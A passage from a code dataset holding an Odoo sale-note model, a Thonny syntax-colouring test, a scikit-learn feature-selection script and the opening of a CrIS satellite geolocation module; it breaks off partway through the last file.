'mail.thread'\r\n _description = 'Sale Note'\r\n\r\n @api.model\r\n def _default_currency(self):\r\n current_user_id=self._context.get('uid')\r\n current_user=self.env['res.users'].browse([current_user_id])\r\n currency_uf=None\r\n currency_obj=self.env['res.currency']\r\n currency_uf=currency_obj.search([('name','=','UF')], limit=1)\r\n if currency_uf:\r\n return currency_uf\r\n else:\r\n return current_user.company_id.currency_id\r\n\r\n @api.depends('partner_id','sale_note_number','partner_id.partner_abbr')\r\n def _compute_reference(self):\r\n abbr=None\r\n for sale in self:\r\n if sale.sale_note_number and sale.partner_id:\r\n abbr=sale.partner_id.partner_abbr\r\n if abbr and \"ABR\" in sale.sale_note_number:\r\n sale.sale_note_reference=sale.sale_note_number.replace(\"ABR\",abbr)\r\n else:\r\n raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(sale.partner_id.name,))\r\n else:\r\n sale.sale_note_reference=_(\"Ref. 
No Disponible\")\r\n\r\n\r\n name=fields.Char('Description', required=True)\r\n partner_id=fields.Many2one('res.partner',string='Partner',store=True, required=True)\r\n partner_rut=fields.Char(related='partner_id.vat', string='RUT Cliente') \r\n partner_name=fields.Char(related='partner_id.name')\r\n street = fields.Char(related='partner_id.street', store=True, readonly=True)\r\n street2 = fields.Char(related='partner_id.street2', store=True,readonly=True)\r\n city = fields.Char(related='partner_id.city', store=True,readonly=True)\r\n zip = fields.Char(related='partner_id.zip', store=True,readonly=True)\r\n address_state = fields.Char(related='partner_id.state_id.name', store=True,readonly=True)\r\n country = fields.Char(related='partner_id.country_id.name', store=True,readonly=True)\r\n\r\n #contact for the sale note\r\n\r\n contact_id=fields.Many2one('res.partner',string='Contact', domain=\"[('parent_id','=',partner_id),('is_company','=',False)]\",store=True)\r\n contact_function= fields.Char(related='contact_id.function', store=True,readonly=True)\r\n contact_name= fields.Char(related='contact_id.name', store=True,readonly=True)\r\n contact_email= fields.Char(related='contact_id.email', store=True,readonly=True)\r\n contact_phone= fields.Char(related='contact_id.phone', store=True,readonly=True)\r\n contact_mobile= fields.Char(related='contact_id.mobile', store=True,readonly=True)\r\n user_id=fields.Many2one('res.users',string='Vendedor',store=True)\r\n salesman_id=fields.Many2one('res.users',string='Vendedor',store=True)\r\n\r\n #oppportunity link crm.lead\r\n\r\n project_id=fields.Many2one('project.project',string='Project',store=True, required=False, ondelete='cascade')\r\n external_lead=fields.Char(string='Oportunidad externa')\r\n\r\n #sales fields\r\n project_currency_id = fields.Many2one('res.currency', string='Currency',required=False, default=_default_currency, track_visibility='always', ondelete='restrict')\r\n price=fields.Monetary('Price', currency_field='project_currency_id',required=True, help='Price of Project')\r\n cost=fields.Monetary('Cost', currency_field='project_currency_id',required=True, help='Cost of Project')\r\n margin=fields.Float('Margen',digits=(16,2), readonly=True, help='Margen of Project')\r\n total_hours=fields.Float('Horas Total',digits=(6,1), help='Total Horas Vendidas')\r\n\r\n #invoice lines\r\n # invoice_ids=fields.One2many('crm.sale.note.invoice','note_id','Sales Note Invoice Lines')\r\n # supplier_ids=fields.One2many('crm.sale.note.supplier','note_id','Sales Note Supplier Lines')\r\n # comission_ids=fields.One2many('crm.sale.note.comm','note_id','Sales Note Commission Lines')\r\n doc_count=fields.Integer(compute=\"_get_attached_docs\", string=\"Number of documents attached\")\r\n purchase_order_id=fields.Many2many('purchase.order', string='Orden de Compra')\r\n purchase_order=fields.Char(string='O/C')\r\n\r\n\r\n order_line_quotation = fields.One2many('sale.order.line', 'order_id_quotation', string='Order Lines')\r\n date_from = fields.Date(string=\"Fecha Inicio\")\r\n date_to = fields.Date(string=\"Fecha Fin\")\r\n\r\n #sale note reference...basically a copy of project reference\r\n sale_note_number= fields.Char('Numero Referencia')\r\n sale_note_reference= fields.Char('Referencia', compute=\"_compute_reference\", store=True)\r\n\r\n\r\n\r\n\r\n \"\"\"_sql_constraints = [\r\n ('sale_note_uniq',\r\n 'UNIQUE (name,lead_id)',\r\n _('Sales Note name must be unique for the Opportunity!'))]\"\"\"\r\n\r\n @api.multi\r\n def _get_attached_docs(self):\r\n 
res = {}\r\n attachment = self.env['ir.attachment']\r\n for note in self:\r\n note_attachments = attachment.search([('res_model', '=', 'crm.sale.note'), ('res_id', '=', note.id)])\r\n self.doc_count= len(note_attachments) or 0\r\n\r\n # @api.multi\r\n # @api.onchange('invoice_ids')\r\n # @api.depends('invoice_ids')\r\n # def compute_max_line_sequence(self):\r\n # #Allow to know the highest sequence\r\n # #entered in purchase order lines.\r\n # #Web add 10 to this value for the next sequence\r\n # #This value is given to the context of the o2m field\r\n # #in the view. So when we create new purchase order lines,\r\n # #the sequence is automatically max_sequence + 10\r\n\r\n\r\n # self.max_line_sequence = (\r\n # max(self.mapped('invoice_ids.sequence') or [0]) + 1)\r\n\r\n # @api.multi\r\n # @api.onchange('supplier_ids')\r\n # @api.depends('supplier_ids')\r\n # def compute_max_supplier_sequence(self):\r\n # #Allow to know the highest sequence\r\n # #entered in purchase order lines.\r\n # #Web add 10 to this value for the next sequence\r\n # #This value is given to the context of the o2m field\r\n # #in the view. So when we create new purchase order lines,\r\n # #the sequence is automatically max_sequence + 10\r\n\r\n # self.max_supplier_sequence = (\r\n # max(self.mapped('supplier_ids.sequence') or [0]) + 1)\r\n\r\n # max_line_sequence = fields.Integer(string='Max sequence in lines',compute='compute_max_line_sequence')\r\n # max_supplier_sequence = fields.Integer(string='Max sequence in Supplier',compute='compute_max_supplier_sequence')\r\n\r\n @api.multi\r\n def attachment_tree_view(self):\r\n domain = [('res_model', '=', 'crm.sale.note'), ('res_id', 'in', self.ids)]\r\n res_id = self.ids and self.ids[0] or False\r\n\r\n return {\r\n 'name': _('Attachments'),\r\n 'domain': domain,\r\n 'res_model': 'ir.attachment',\r\n 'type': 'ir.actions.act_window',\r\n 'view_id': False,\r\n 'view_mode': 'kanban,tree,form',\r\n 'view_type': 'form',\r\n 'limit': 80,\r\n 'target':'same',\r\n 'context': \"{'default_res_model': '%s','default_res_id': %d}\" % (self._name, res_id)\r\n }\r\n\r\n @api.model\r\n def create(self, vals):\r\n abbr=None\r\n sequence_dict={}\r\n partner=self.env['res.partner'].browse(vals['partner_id'])\r\n abbr=partner.partner_abbr\r\n\r\n if not abbr or abbr==\"\":\r\n raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(partner.name,))\r\n\r\n sequence_dict=self.env['res.config.settings'].sudo().get_values()\r\n sequence_id=sequence_dict['project_sequence']\r\n \r\n _logger.info(\"secuence=%s\",sequence_dict)\r\n if not sequence_id:\r\n raise exceptions.Warning(_('Sequencia no esta configurada. Por favor, contactese con el Administrador de sistema'))\r\n\r\n sequence_id=sequence_dict['project_sequence']\r\n vals['sale_note_number'] = self.env['ir.sequence'].sudo().next_by_code('project_sale_order')\r\n vals['sale_note_reference']=vals.get('sale_note_number').replace(\"ABR\",abbr)\r\n\r\n res=super(crm_sale_note, self).create(vals)\r\n return res\r\n\r\n @api.multi\r\n def write(self,vals):\r\n #create project_reference if project_reference not set\r\n if (not self.sale_note_reference or self.sale_note_reference=='Ref. 
No Disponible') and (self.partner_id or 'partner_id' in vals):\r\n            abbr=None\r\n            sequence_dict={}\r\n            if not vals.get('partner_id',False):\r\n                partner=self.env['res.partner'].browse(self.partner_id.id)\r\n                abbr=partner.partner_abbr\r\n            else:\r\n                partner=self.env['res.partner'].browse(vals['partner_id'])\r\n                abbr=partner.partner_abbr\r\n\r\n            if not abbr or abbr==\"\":\r\n                raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(partner.name,))\r\n\r\n            sequence_dict=self.env['res.config.settings'].sudo().get_values()\r\n            sequence_id=sequence_dict['project_sequence']\r\n\r\n            if not sequence_id:\r\n                raise exceptions.Warning(_('Sequencia no esta configurada. Por favor, contactese con el Administrador de sistema'))\r\n\r\n            sequence_id=sequence_dict['project_sequence']\r\n            vals['sale_note_number'] = self.env['ir.sequence'].next_by_code('project_sale_order')\r\n            vals['sale_note_reference']=vals.get('sale_note_number').replace(\"ABR\",abbr)\r\n\r\n        res=super(crm_sale_note, self).write(vals)\r\n        return res","sub_path":"apiux_project/models/sale_note.py","file_name":"sale_note.py","file_ext":"py","file_size_in_byte":9777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"438452144","text":"import tkinter\n\nfrom thonny.plugins.coloring import SyntaxColorer\nimport tkinter.font as tk_font\n\n\nTEST_STR1 = \"\"\"def my_function():\n    str1 = \"aslas'\"\n    str2 = 'asdasd\"asda\n    str3 = '''asdasdasd\n    asdas\n    sdsds'''\n\"\"\"\n\nOPEN_TAG_NAME = \"STRING_OPEN\"\nCLOSED_TAG_NAME = \"STRING_CLOSED\"\n\n\ndef test_open_closed_strings():\n\n    text_widget = tkinter.Text()\n    text_widget.insert(\"insert\", TEST_STR1)\n\n    font = tk_font.nametofont(\"TkDefaultFont\")\n    colorer = SyntaxColorer(text_widget, font, font)\n    colorer.recolorize()\n\n    open_ranges = text_widget.tag_ranges(OPEN_TAG_NAME)\n    closed_ranges = text_widget.tag_ranges(CLOSED_TAG_NAME)\n\n    expected_open_ranges = {('3.11', '4.0'), }\n    expected_closed_ranges = {('2.11', '2.19'), ('4.11', '6.12'), }\n\n    open_ranges_set = set([(str(open_ranges[i]), str(open_ranges[i+1])) for i in range(0, len(open_ranges), 2)])\n    closed_ranges_set = set([(str(closed_ranges[i]), str(closed_ranges[i+1])) for i in range(0, len(closed_ranges), 2)])\n\n    assert open_ranges_set == expected_open_ranges\n    assert closed_ranges_set == expected_closed_ranges\n    print(\"test passed\")\n\n\ndef run_tests():\n    test_open_closed_strings()\n\nif __name__ == \"__main__\":\n    print(\"Test input: \")\n    print(TEST_STR1)\n    run_tests()\n","sub_path":"tests/plugin_tests/coloring_tests.py","file_name":"coloring_tests.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180171500","text":"# This code uses feature selection algorithms with different models\n# to obtain the most important features of our data\n# Algorithms used are stability selection, rfe and rfecv\n\n# Import relevant packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import RFE, RFECV\nfrom sklearn.linear_model import LogisticRegression, Lasso, LinearRegression, RandomizedLasso, RandomizedLogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import tree\nfrom sklearn.model_selection import StratifiedKFold\nimport numpy as np\n\n\n# Read file\n# When doing transportation comment out line 25\n# df = pd.read_csv('transportationet.csv', 
index_col='Unnamed: 0')\n# When doing data_greater_than_20 uncomment line 25\ndf = pd.read_csv('data_greater_than_20.csv', index_col='Unnamed: 0')\n#df = pd.read_csv('~/Downloads/network_classification/src/data/data_greater_than_20.csv', index_col='Unnamed: 0')\n\n# # Delete categorical column\ndel df['Graph']\n\n\n# Change the collection names to numbers\ndf['Collection'] = df['Collection'].astype('category')\ndf['Collection'] = df['Collection'].cat.codes\n\n# Get all column names\ncol_names = df.keys()\n\n# Create array of the values and define X and Y\ndf_array = df.values\nX = df_array[:, 1:15]\nY = df_array[:, 0] #target variable (collection)\n\n# Number of important features we want to extract\n# Using 1 will give us the ranking of all of the features\nnum_of_features = 1\n\n\n\n#**************************************\n# RFE feature selection function\n#**************************************\n\n# Define function that runs RFE in different models\ndef rfe_function(model, model_name, num_of_features, X, Y):\n rfe = RFE(model, num_of_features)\n fit = rfe.fit(X,Y)\n print(\"\\n\" + model_name)\n print(\"Num Features: \" + str(fit.n_features_))\n print(\"Selected Features: \" + str(fit.support_))\n print(\"Feature Ranking: \" + str(fit.ranking_))\n # Print the most important feature\n print(\"\\nMost Important Feature in \" + model_name + \": \")\n for i, val in enumerate(fit.ranking_):\n if val == True:\n print(col_names[i+1])\n\n\n# Calling function to run RFE with different models\nrfe_function(LogisticRegression(), \"Logistic Regression\", num_of_features, X, Y)\nrfe_function(Lasso(alpha = 0.1), \"Lasso Regression\", num_of_features, X, Y)\nrfe_function(LinearSVC(), \"Linear SVC\", num_of_features, X, Y)\nrfe_function(LinearRegression(), \"Linear Regression\", num_of_features, X, Y)\nrfe_function(tree.DecisionTreeClassifier(random_state=42), \"Decision Tree\", num_of_features, X, Y)\nrfe_function(RandomForestClassifier(random_state=42), \"Random Forest\", num_of_features, X, Y)\n\n\n\n# *******************************************\n# Stability Selection Method\n# *******************************************\n\ndef stability_select(model, model_name, X, Y):\n model.fit(X,Y)\n print(model_name)\n print(\"Features sorted by their score:\")\n print(sorted(zip(map(lambda x: round(x, 4), model.scores_), col_names), reverse=True))\n\n\nstability_select(RandomizedLasso(alpha=0.01), \"\\nRandomized Lasso Regression\", X, Y)\nstability_select(RandomizedLogisticRegression(), \"\\nRandomized Logistic Regression\", X, Y)\n\n#**************************************\n# RFECV feature selection\n#**************************************\nlist = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ndf_features = pd.DataFrame(index=pd.Series(range(14)))\niterations = 100\ntotal_num_features = 14\n\ndef rfecv(model, name):\n for j in range(iterations):\n rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(n_splits=5, shuffle=False),\n scoring='accuracy')\n\n rfecv.fit(X, Y)\n # Uncomment this to see the ranking of the features in rfecv\n print(\"Optimal number of features : %d\" % rfecv.n_features_)\n print(\"Selected Features: \" + str(rfecv.support_))\n print(\"Feature Ranking: \" + str(rfecv.ranking_))\n\n # Get grid scores\n g_scores = rfecv.grid_scores_\n indices = np.argsort(g_scores)[::-1]\n print('Printing RFECV results:')\n\n for f in range(X.shape[1]):\n # print(\"%d. 
Number of features: %d, Grid_Score: %f\" % (f + 1, indices[f] + 1, g_scores[indices[f]]))\n for i in range(total_num_features):\n if indices[f] == i :\n list[i] = list[i] + g_scores[indices[f]]\n print('List: ' + str(list))\n\n df_features['scores'] = list\n print(df_features.columns)\n\n\n for m in range(total_num_features):\n list[m] = list[m]/iterations\n\n print('New List: ' + str(list))\n\n\n\n # Plot number of features VS. cross-validation scores\n plt.figure()\n plt.title(name, {'size': '22'})\n plt.xlabel(\"Number of features selected\", {'size': '18'})\n plt.ylabel(\"Cross validation score \\n(nb of correct classifications)\", {'size': '18'})\n plt.plot(range(1, len(list) + 1), list)\n plt.show()\n\n return list\n\n\n\n# Calling RFECV function for all three models\nrfecv(LinearSVC(), \"RFECV - Linear SVC\")\nrfecv(tree.DecisionTreeClassifier(), \"RFECV - Decision Tree\")\nrfecv(RandomForestClassifier(), \"RFECV - Random Forest\")\n\n\n# Used to save rfecv data\n# Change file or path name as desired\nlist = pd.DataFrame(list)\nlist.to_csv('rfecv_random_tree_data.csv')\n#list.to_csv('~/Downloads/network_classification/src/data/rfecv_random_tree_data.csv')\n","sub_path":"foodandtransportation/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468601487","text":"# -*- coding: utf-8 -*-\n# geolocation.py\n\n# Copyright (c) 2015-2018, Likun Wang (Likun.Wang@noaa.gov)\n# Copyright (c) 2015-2018, Earth System Science Interdisciplinary \n# Center/Univ. of Maryland \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holders nor the names of any\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\" Accurate and fast geolocaiton coordinate transformation.\n\nA collection of functions to handle geolocaiton coordinate transformation. \nBasically, it follows the same functions from ADL common geolocation library \nby calling the same library and using the same parameters for accuracy \nconsideration. In addition, to achieve the fast calculations, some functions \nare vectorized. 
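\n\nA minimal round-trip sketch (hypothetical coordinates; both helpers are defined below in this module):\n\n>>> x, y, z = LLA2ECEF(-76.9, 38.9, 0.0)  # lon, lat in degrees, alt in meters\n>>> lon, lat, alt = ECEF2LLA(x, y, z)  # back to WGS84 lon, lat, alt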
\n\n:Author:\n `Likun Wang `_\n\n:Organization:\n Earth System Science Interdisciplinary Center/Univ. of Maryland \n\n:Version: 2018.9.5\n\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nfrom numpy import sqrt, sin, cos, tan, deg2rad, \\\n arctan2, arctan, arcsin, rad2deg, arccos \nfrom numpy import arcsin as asin\nfrom numpy import arctan2 as atan2\n\nfrom datetime import datetime, timedelta\nfrom functools import partial\nfrom itertools import izip\n\nimport pyproj\nfrom novas.compat import cel2ter, ter2cel\n\nfrom astropy.time import Time, TimeDelta\nfrom astropy.utils import iers\nfrom pykdtree.kdtree import KDTree\n\nfrom jpss import cris_sensor_info\n\nimport time\n\nWGS84_A = 6378137.0\nWGS84_F = 1.0 / 298.257223563\nWGS84_B = WGS84_A*(1.0 - WGS84_F)\nWGS84_E2 = 2 * WGS84_F - WGS84_F ** 2\n\neq_rad_km=6.37813700000000e+3; #/* equatorial radius, KM */\neq_radm=6.37813700000000e+6; #/* equatorial radius, meters */\npole_radm=6.35675231424518e+6; #/* polar_radius, meters */\neccen_sqr=6.69437999014132e-3; #/* e^2 = f(2 - f) */\ndetic2centric=9.93305620009859e-1; #/* 1 - e^2 */\ncentric2detic=1.00673949674228e+0; #/* 1 / (1 - e^2) */\ndelta=6.73949674227643e-3; #/* ( 1/(1-f)^2 ) - 1 */\n\n#Rotational angular velocity of Earth in radians/sec from IERS\n# Conventions (2003).\nANGVEL = 7.2921150e-5;\n\n# Polar Wonder data\n#iers.conf.auto_download = False\ndat = iers.IERS_Auto.open()\n\n# NPP/CrIS parameters \npara = cris_sensor_info()\n\n\n#####################################################################################\ndef rotationMatrixY(thePitch): \n\n \"\"\"\n Compute rotation matrix around Y axis\n \"\"\"\n thePitch = np.asarray(thePitch, dtype=np.float64)\n \n pitchMatrix = np.zeros((thePitch.size, 3, 3), dtype=np.float64)\n pitchMatrix[:, 0,0] = cos(thePitch)\n pitchMatrix[:, 0,1] = 0\n pitchMatrix[:, 0,2] = sin(thePitch)\n\n pitchMatrix[:, 1,0] = 0\n pitchMatrix[:, 1,1] = 1\n pitchMatrix[:, 1,2] = 0\n\n pitchMatrix[:, 2,0] = -sin(thePitch)\n pitchMatrix[:, 2,1] = 0\n pitchMatrix[:, 2,2] = cos(thePitch)\n \n return np.squeeze(pitchMatrix)\n \ndef rotationMatrixX(theRoll):\n\n \"\"\"\n Compute rotation matrix around X axis\n \"\"\" \n theRoll = np.asarray(theRoll, dtype=np.float64)\n \n rollMatrix = np.zeros((theRoll.size, 3, 3), dtype=np.float64)\n\n rollMatrix[:, 0,0] = 1;\n rollMatrix[:, 0,1] = 0;\n rollMatrix[:, 0,2] = 0;\n\n rollMatrix[:, 1,0] = 0;\n rollMatrix[:, 1,1] = cos(theRoll);\n rollMatrix[:, 1,2] = -sin(theRoll);\n\n rollMatrix[:, 2,0] = 0;\n rollMatrix[:, 2,1] = sin(theRoll);\n rollMatrix[:, 2,2] = cos(theRoll);\n\n return np.squeeze(rollMatrix)\n\ndef rotationMatrixZ(theYaw): \n\n \"\"\"\n Compute rotation matrix around Z axis\n \"\"\" \n theYaw = np.asarray(theYaw, dtype=np.float64)\n\n yawMatrix = np.zeros((theYaw.size, 3, 3), dtype=np.float64)\n \n yawMatrix[:, 0,0] = cos(theYaw)\n yawMatrix[:, 0,1] = -sin(theYaw)\n yawMatrix[:, 0,2] = 0\n\n yawMatrix[:, 1,0] = sin(theYaw)\n yawMatrix[:, 1,1] = cos(theYaw)\n yawMatrix[:, 1,2] = 0\n\n yawMatrix[:, 2,0] = 0\n yawMatrix[:, 2,1] = 0\n yawMatrix[:, 2,2] = 1\n\n return np.squeeze(yawMatrix);\n\n\ndef dot_product(v, w):\n \"\"\"\n Dot product of two vectors\n \"\"\"\n return np.einsum('...j,...j->...', v, w)\n\ndef matrix_matrix_product(A, B):\n \"\"\"\n Product of two matrix\n \"\"\"\n return np.einsum('...jk,...kl->...jl', A, B)\n \ndef matrix_vector_product(M, v):\n \"\"\"\n Product of matrix with vector\n \"\"\"\n return 
np.einsum('...jk,...k->...j', M, v) \n\ndef normalize_vector(v): \n \"\"\"\n Unit vector of the vectors\n \"\"\"\n v = np.asarray(v, dtype=np.float64) \n mag = np.sqrt(np.einsum('...i,...i', v, v))\n if mag.size ==1: return v/mag\n else: return v/np.expand_dims(mag, axis=-1) \n\ndef mag_vector(v): \n \"\"\"\n the magnitude of the vectors\n \"\"\"\n v = np.asarray(v, dtype=np.float64) \n mag = np.sqrt(np.einsum('...i,...i', v, v))\n return mag\n \ndef findAnglesBetweenTwoVectors(v1s, v2s):\n \"\"\"\n the angle of the two vectors\n \"\"\"\n v1s = np.asarray(v1s, dtype=np.float64)\n v2s = np.asarray(v2s, dtype=np.float64)\n\n dot_v1_v2 = dot_product(v1s, v2s)\n dot_v1_v1 = dot_product(v1s, v1s)\n dot_v2_v2 = dot_product(v2s, v2s)\n return np.rad2deg(np.arccos(dot_v1_v2/(np.sqrt(dot_v1_v1)*np.sqrt(dot_v2_v2))))\n \ndef Triad (v1, v2, r1, r2): \n \"\"\"\n Derive transformation matrix from two vectors. The ideas are from\n https://en.wikipedia.org/wiki/Triad_method\n \n INPUTS: R = A V\n A is Transformation matrix [3,3]\n V1, V2: the two vector in reference coordinates\n R1, R2: the two vector in transfomed coordinates\n \"\"\" \n vv1 = normalize_vector(v1)\n vv2 = normalize_vector(v2)\n vv3 = normalize_vector(np.cross(v1, v2))\n vv4 = np.cross(vv1, vv3)\n \n rr1 = normalize_vector(r1)\n rr2 = normalize_vector(r2)\n rr3 = normalize_vector(np.cross(r1, r2))\n rr4 = np.cross(rr1, rr3)\n \n a1 = np.column_stack((vv1, vv3, vv4))\n a2 = np.column_stack((rr1, rr3, rr4))\n a = matrix_matrix_product(a2, a1.T)\n \n return a\n \n \ndef compute_alpha_beta(v, degree=False): \n\n \"\"\"\n Convert three-variable vector into two-variable degree for \n perturbation purpose. \n \"\"\"\n\n v = np.asarray(v, dtype=np.float64)\n \n if v.ndim == 1: v = np.expand_dims(v, axis=0)\n if v.ndim >= 2: \n sz = v.shape\n v = v.reshape(-1, 3)\n \n alpha = atan2(v[:, 0], v[:, 2])\n beta = atan2(v[:, 1], v[:, 2])\n \n if degree: alpha, beta = rad2deg(alpha), rad2deg(beta)\n \n return alpha.reshape(sz[:-1]), beta.reshape(sz[:-1])\n \n \ndef haversine(lon1, lat1, lon2, lat2, R=None):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n \"\"\"\n \n if R is None: R=6367.0\n \n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(deg2rad, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * arcsin(sqrt(a))\n km = R * c\n return km\n \ndef rotate_vec (rotationAxis, angle, oldVector, degree=True): \n\n rotationAxis = np.asarray(rotationAxis, dtype=np.float64)\n angle = np.asarray(angle, dtype=np.float64)\n oldVector = np.asarray(oldVector, dtype=np.float64)\n \n ## check vector size \n if rotationAxis.size != oldVector.size: \n print ('The vector size does not match')\n return\n \n if rotationAxis.ndim == 1: \n rotationAxis=np.expand_dims(rotationAxis, axis=0)\n \n if oldVector.ndim == 1: \n oldVector=np.expand_dims(oldVector, axis=0) \n \n if angle.size != 1: \n print('check angle input')\n return \n \n ## we need to normalize rotationAxis \n mag = np.linalg.norm(rotationAxis, axis=1)\n rotationAxis= rotationAxis/np.expand_dims(mag, axis=1)\n\n ## check angle unit \n if degree: angle = np.deg2rad(angle)\n \n cosAngle = cos(angle) ;\n sinAngle = sin(angle) ;\n\n ## 1st term\n firstTerm = oldVector * cosAngle ;\n \n ## 2nd term\n secondTerm = np.cross(oldVector, rotationAxis) * sinAngle \n \n ## 3rd term \n temp= np.einsum('ij,ij->i', oldVector, 
rotationAxis)\n temp= np.expand_dims(temp, axis=1)\n thirdTerm = (temp * rotationAxis) * ( 1.0 - cosAngle) ;\n newVector = firstTerm - secondTerm + thirdTerm ;\n \n return newVector \n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return idx\n \ndef reject_outliers(data, m=2):\n return data[abs(data - np.mean(data)) < m * np.std(data)] \n \n##################################################################################### \ndef buildFovLosInSSMF(FlipFOV=False): \n\n \n ## from SBF_To_IAR\n MatrixP = rotationMatrixY (para['SBFtoIAR_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SBFtoIAR_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SBFtoIAR_yaw']*1e-6)\n Mat_SBFtoIAR = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SBFtoIAR = matrix_matrix_product(Mat_SBFtoIAR, MatrixY)\n\n ## from IAR_To_SSMR\n MatrixP = rotationMatrixY (para['IARtoSSMR_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['IARtoSSMR_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['IARtoSSMR_yaw']*1e-6)\n Mat_IARtoSSMR = matrix_matrix_product(MatrixR, MatrixP)\n Mat_IARtoSSMR = matrix_matrix_product(Mat_IARtoSSMR, MatrixY)\n\n ## from SSMR_To_SSMF\n MatrixP = rotationMatrixY (para['SSMRtoSSMF_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SSMRtoSSMF_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SSMRtoSSMF_yaw']*1e-6)\n Mat_SSMRtoSSMF = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SSMRtoSSMF = matrix_matrix_product(Mat_SSMRtoSSMF, MatrixY)\n\n Mat_SBFtoSSMF = matrix_matrix_product(matrix_matrix_product(Mat_SBFtoIAR, Mat_IARtoSSMR), Mat_SSMRtoSSMF)\n\n ## nominal optical axis direction\n opticalAxis = np.array([1.0, 0, 0], dtype=np.float64)\n\n LW_FOV5_inTrk = para['lw_losRelativePitch'] \n LW_FOV5_crTrk = para['lw_losRelativeYaw'] \n\n fov_inTrackAngle = np.asarray(para['lw_intrackOffsetAngle'], dtype=np.float64)\n fov_crTrackAngle = np.asarray(para['lw_crosstrackOffsetAngle'], dtype=np.float64)\n\n losInIOAR = np.zeros((fov_inTrackAngle.size, 3))\n losInSSMF = np.zeros((fov_inTrackAngle.size, 3))\n\n for i in range(0, fov_inTrackAngle.size):\n\n ifov = i \n if FlipFOV: \n if i==0: ifov = 2\n if i==2: ifov = 0\n if i==3: ifov = 5\n if i==5: ifov = 3\n if i==6: ifov = 8\n if i==8: ifov = 6\n \n fovYaw = -1.0*(fov_crTrackAngle[ifov] + LW_FOV5_crTrk)*1.0e-6\n fovPitch = (fov_inTrackAngle[ifov] + LW_FOV5_inTrk)*1.0e-6\n \n losInIOAR[i, :] = matrix_vector_product(rotationMatrixZ(fovYaw), opticalAxis)\n losInIOAR[i, :] = matrix_vector_product(rotationMatrixY(fovPitch), losInIOAR[i, :]) \n \n # Apply IOAR-SSMF transformation to account for pitch and yaw \n # misalignments between interferometer and scan mechanism\n losInSSMF[i, :] = matrix_vector_product(rotationMatrixZ(para['IFRboresighttoSSMF_yaw']*1e-6) , losInIOAR[i, :])\n losInSSMF[i, :] = matrix_vector_product(rotationMatrixY(para['IFRboresighttoSSMF_pitch']*1e-6), losInSSMF[i, :])\n \n return losInSSMF, Mat_SBFtoSSMF\n \n##################################################################################### \ndef buildMatSCToSBF (): \n \n ## from SC_To_SBF\n MatrixP = rotationMatrixY (para['SCtoSBF_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SCtoSBF_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SCtoSBF_yaw']*1e-6)\n Mat_SCtoSBF = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SCtoSBF = matrix_matrix_product(Mat_SCtoSBF, MatrixY)\n return Mat_SCtoSBF\n\n##################################################################################### \n\ndef buildLosInSBF(forIET, servoErrCrTrk=None, 
